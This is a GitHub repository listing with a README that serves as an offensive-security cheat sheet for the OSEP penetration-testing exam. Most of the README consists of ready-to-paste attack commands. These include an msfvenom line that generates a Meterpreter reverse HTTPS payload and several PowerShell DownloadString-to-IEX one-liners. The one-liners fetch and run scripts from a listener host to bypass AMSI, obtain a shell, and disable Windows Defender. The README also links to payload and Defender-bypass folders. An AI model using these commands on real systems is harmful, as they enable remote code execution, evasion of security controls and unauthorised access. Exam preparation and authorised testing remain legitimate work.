https://github.com/tapxworld/osep_tools
some command tools for OSEP exam
https://github.com/tapxworld/osep_tools
Last synced: about 1 month ago
JSON representation
some command tools for OSEP exam
- Host: GitHub
- URL: https://github.com/tapxworld/osep_tools
- Owner: TapXWorld
- Created: 2022-12-17T07:45:18.000Z (over 3 years ago)
- Default Branch: main
- Last Pushed: 2023-01-23T15:15:52.000Z (over 3 years ago)
- Last Synced: 2025-01-11T00:12:46.610Z (over 1 year ago)
- Language: PowerShell
- Size: 5.24 MB
- Stars: 1
- Watchers: 2
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# OSEP
this repository modified based on from `https://github.com/In3x0rabl3/OSEP`
# Summary
This repository will refresh your memory when taking the OSEP exam.
Thank you, to everyone who's code was used in this repository.
# Table of Contents
- [OSEP_Reference](https://github.com/In3x0rabl3/OSEP/blob/main/osep_reference.md)
- [OSEP_Checklist](https://github.com/In3x0rabl3/OSEP/blob/main/osep_checklistv2.md)
- [OSEP_Payloads](https://github.com/In3x0rabl3/OSEP/tree/main/Payloads)
- [OSEP_Bypass_Defender](https://github.com/In3x0rabl3/OSEP/tree/main/Bypass_Defender)
- [OSEP_Lateral_Movement](https://github.com/In3x0rabl3/OSEP/tree/main/Lateral_Movement)
- [OSEP_MSSQL](https://github.com/In3x0rabl3/OSEP/tree/main/MSSQL)
# OneKey Bypass Powershell And Get Shell
```
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.0.0.234 LPORT=443 -f ps1
(New-Object Net.WebClient).DownloadString('http://10.0.0.234:8000/msfvenom_bin/bypass_Ams1_getShell.ps1') | IEX;
```
# OneKey Bypass Posershell AMSI
```
(New-Object Net.WebClient).DownloadString('http://10.0.0.234:8000/bypass_defender/bypassAms1.ps1') | IEX;
```
# OneKey Disable Windows Defender
```
(New-Object Net.WebClient).DownloadString('http://10.0.0.234:8000/bypass_defender/DefendersDeath.ps1') | IEX;
(New-Object Net.WebClient).DownloadString('http://10.0.0.234:8000/bypass_defender/DisableDefender.ps1') | IEX;
+ (need administrator priviledge)
```
# Other
```
git clone https://github.com/andrew-d/static-binaries.git
git clone https://github.com/optiv/Freeze
git clone https://github.com/noraj/OSCP-Exam-Report-Template-Markdown
```